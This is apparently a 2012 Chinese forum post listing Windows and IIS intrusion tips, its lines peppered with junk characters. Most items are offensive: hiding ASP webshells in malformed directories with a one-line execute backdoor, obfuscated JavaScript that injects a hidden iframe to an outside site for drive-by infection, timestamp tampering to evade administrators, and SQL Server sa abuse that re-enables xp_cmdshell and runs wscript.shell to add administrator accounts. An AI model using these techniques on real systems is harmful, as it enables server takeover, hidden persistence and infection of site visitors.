& T7 ~+ w& a' ^: q用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& M& X1 x! ^& _. }/ i
) G; g/ f. q# y7 p: h0 S8 r53、隐藏ASP后门的两种方法5 r3 W: w8 Z0 w9 N' l9 w
1、建立非标准目录:mkdir images..\; e9 O% w. Z9 r6 X" N3 S
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
1 g u7 B+ Y3 u! W通过web访问ASP木马:http://ip/images../news.asp?action=login* P8 ?; Z- x, a
如何删除非标准目录:rmdir images..\ /s/ P9 D5 Y7 K5 W3 n' h+ }
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:) T7 [' R ?2 R g
mkdir programme.asp
, F6 I. j# U3 n, z x" K" u新建1.txt文件内容:<!--#include file=”12.jpg”-->9 ]0 a2 N0 @+ R$ q$ I# @
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
9 p X, }! u, m) mattrib +H +S programme.asp0 v. I8 L& B6 ^& F, l6 U' H; r& n
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- Z2 s+ E' V( d9 ~' E
2 e B# z/ i" y# T3 a54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。/ e: n- }( E4 w4 l$ Y( h
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
, u) X& I$ M1 @& [1 h0 |1 Z+ ]- w! T, v- J+ t& F5 q
55、JS隐蔽挂马
, |% \& B. P; R3 ]5 N1.
7 U9 x0 k6 j/ uvar tr4c3="<iframe src=ht";
$ ^$ |# Z1 S1 d3 h1 G, m2 ]tr4c3 = tr4c3+"tp:/";
# O7 f+ v5 i3 N! T$ O. qtr4c3 = tr4c3+"/ww";# Q! h% x! T) F1 E/ L0 d
tr4c3 = tr4c3+"w.tr4";
3 ?! i" D- E; wtr4c3 = tr4c3+"c3.com/inc/m";
+ u, e5 Z/ |, ~ k2 [tr4c3 = tr4c3+"m.htm style="display:none"></i";
m; h$ Q! g2 Z# l9 l- q% _tr4c3 =tr4c3+"frame>'";* q m9 V4 t5 Y$ D, o% h
document.write(tr4c3);/ P: c- Y9 H) C; ^0 Y# _( a
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。, D! ^* e) Q( @: o, w# I/ S1 @
& ~7 a. T2 T3 m
2.
; R5 B( u. s, K! b2 \, L转换进制,然后用EVAL执行。如6 S$ w2 f9 Y0 t" D5 [; R
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
: M: ]( N$ G. Y4 F不过这个有点显眼。
* B% ^) g' u# f& Z6 v* z3.
* v$ y2 W9 m9 m8 N$ ydocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>'); H& x# ?/ u9 Q+ X
最后一点,别忘了把文件的时间也修改下。# A4 ]- s" F7 b' r8 Z' x+ @
2 Z3 ^" |( e$ L9 Y56.3389终端入侵常用DOS命令, _) G* L" \$ M C
taskkill taskkill /PID 1248 /t" R" a$ N! h0 b: c" n- [" H4 U
$ q' s0 T$ z) w7 c7 {! M( k9 j
tasklist 查进程; h* D+ S% e, n3 K- X+ i' n
5 X$ E) B. i6 f" w& U& O. [& X
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限& c0 S! Y# Q! p, x
iisreset /reboot3 d! C, S6 \) y* w6 N; N% v# x
tsshutdn /reboot /delay:1 重起服务器
* Y, \ K" Y" J: |5 X6 m0 O" g1 i& h+ }" A9 j9 g7 ?7 h
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,# Z8 \; Y" ~+ V* G) k1 o5 y
) a' O8 Y/ F/ e6 D+ `" r1 K
query user 查看当前终端用户在线情况1 W& V) T4 _/ r* ?$ w$ W
$ ^& e/ ~* A& ^7 V r要显示有关所有会话使用的进程的信息,请键入:query process *" M& B& |4 |8 D, L, K. q) l! K
) L. m, f7 O( Y q; n3 K4 z要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
: O# N- W% P/ j* t
+ U y& b/ r4 q. F2 z要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER28 r9 R) t; J! x: N; u; t
: H+ c2 P* I U& V要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
5 q% ], @3 c5 w* |4 M- H: h. G/ S. e
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
3 R6 \ p( J$ k/ v0 r
! y4 [! H" n( t& R4 V; _ {4 h, L+ g命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统0 k! L: d5 [& D! P) x0 c$ B
. n/ } _- h, b4 k9 }! E
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。2 Q; G- ?- e7 q3 P. [( g7 M; s
7 s E6 H; s6 @ k9 D9 Y' U命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机( \, X* }4 U0 i$ ?$ e/ b
o" [! R6 B; i6 m+ ?8 m56、在地址栏或按Ctrl+O,输入:. Y8 p9 U3 a7 ~) @, j4 ^5 m
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
5 J0 {% |, L3 X/ S1 A3 \4 @0 E. W6 c1 C" U. D% I. ~% J
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。) l2 M5 Z- E4 T" C) I
# Z% N& [9 Q" [) F4 c! s57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
3 a# ~1 O5 s3 w$ d: S3 ^# D' k7 Y# l用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 {5 E6 u( \7 G) n! x, \6 s3 e! \ T+ }9 v
58、 sa弱口令相关命令
( ]" S, s: P9 k# C x0 e/ u" I# s) w' k' u, T9 ?
一.更改sa口令方法:; e, x- H& N! K; k1 J
用sql综合利用工具连接后,执行命令:
' m5 I: n9 O6 n- o( aexec sp_password NULL,'20001001','sa'
+ z1 W+ e% b C, z: g(提示:慎用!)% n# i: H1 w7 z$ E g3 @
" ~ {, k2 D- |. m+ D+ q
二.简单修补sa弱口令.
/ n) J0 ]' k- S2 n6 R5 C4 Y5 c" A; N, Q- t6 m: \5 [
方法1:查询分离器连接后执行:
; w" r1 I1 C6 p7 d2 lif exists (select * from
, M3 l4 S0 x ]6 B R- |dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
9 R3 z/ R% ~9 ^OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
* E7 x' N* ]; N$ [) D) T0 |0 n B6 [
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' b- M8 s) v5 g" J7 _: F" t8 u, h1 J7 |# X/ Q
GO
6 `* C/ J" o; }; |: R4 v
: K: w/ t9 @9 T$ K9 J& \; U* \然后按F5键命令执行完毕
8 |6 r# [" ~; C' F
, V3 |0 r: i- j$ L; o; f9 M方法2:查询分离器连接后' Y, o$ V7 c% c4 ~1 m1 u
第一步执行:use master
# T# F' ?0 K8 Y4 \# G8 T第二步执行:sp_dropextendedproc 'xp_cmdshell'! J- l( z ]7 R* ?# \5 Y0 ^3 x( _
然后按F5键命令执行完毕# E& L$ V8 I) _" _% G$ v9 h7 Y
8 h! w* a, M/ U \% j! G2 k9 Q4 q, o
8 @1 i/ n) Y( f* D- I
三.常见情况恢复执行xp_cmdshell.
3 S5 Z& @3 R, I$ f/ Z
/ v: w' [# i* |* c
C& d. L4 j6 `4 P, Q. T" C1 未能找到存储过程'master..xpcmdshell'.
+ w4 ~* c; [' L2 R* W: O1 c 恢复方法:查询分离器连接后,
7 |" O+ ^; B, o第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int* @! E6 ]0 n6 [ q R1 ` q5 n
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 O0 ~- ?. l! i6 P然后按F5键命令执行完毕
: n \' V8 y i+ ]4 c% D3 N y& Q+ D. }7 q$ C u
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)7 K9 t% f; H& \2 I: x
恢复方法:查询分离器连接后,5 y+ O0 K( e9 E
第一步执行:sp_dropextendedproc "xp_cmdshell" J4 a; F8 l6 R# |) g u
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ K3 v. m% l. Z7 u. ?然后按F5键命令执行完毕+ m+ q7 o5 i; ]9 ?! L D
3 N! m' m: H; }& \) e3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. V" n3 w* C+ M2 F/ Q恢复方法:查询分离器连接后,/ F8 L+ c0 i$ P0 O" p
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
8 P! L: c7 D( u7 D B1 X% q第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' Q, `. v9 `) D" r
然后按F5键命令执行完毕
3 k* I2 v Q, Q9 ` A
3 o; }+ `( _" S2 C5 k8 ]四.终极方法.
7 k8 ]( U, G" C p* ^如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:# B7 \# C$ C% U/ R' Q5 v4 M
查询分离器连接后,) a& o. l- T( ~+ K( t1 m3 m' v2 ?
2000servser系统:
/ N- ^$ {0 L$ H5 Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 a2 A& a0 }! B+ B3 o/ q3 V7 @- K
) D0 ] h A( r" I# x9 Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 A3 p3 _4 o& O- }/ |+ a ?
2 e6 K% W/ X) _7 [1 Q+ I
xp或2003server系统:
~" T5 |' }3 i( Y
" ^0 H4 B+ [, ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
7 o; O! |+ |7 [; c- ^ s0 i+ \, e1 H0 d \0 d6 y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'; B5 I* @0 r; n6 j. ?
|
发表于 2012-9-15 14:13:15
收藏
支持
反对